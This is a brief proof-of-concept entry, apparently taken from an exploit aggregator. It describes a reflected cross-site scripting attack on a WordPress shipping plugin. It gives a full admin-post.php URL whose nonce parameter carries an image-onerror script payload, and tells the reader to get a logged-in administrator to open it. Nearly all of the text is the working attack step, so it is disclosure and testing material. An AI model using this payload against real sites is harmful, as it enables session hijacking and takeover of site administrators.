## https://sploitus.com/exploit?id=WPEX-ID:B463CCBB-2DC1-479F-BC88-BECD204B2DC0 Make a logged in admin open https://example.com/wp-admin/admin-post.php?action=multiparcels_delete_shipping&_wpnonce=<img src onerror=alert(/XSS/)>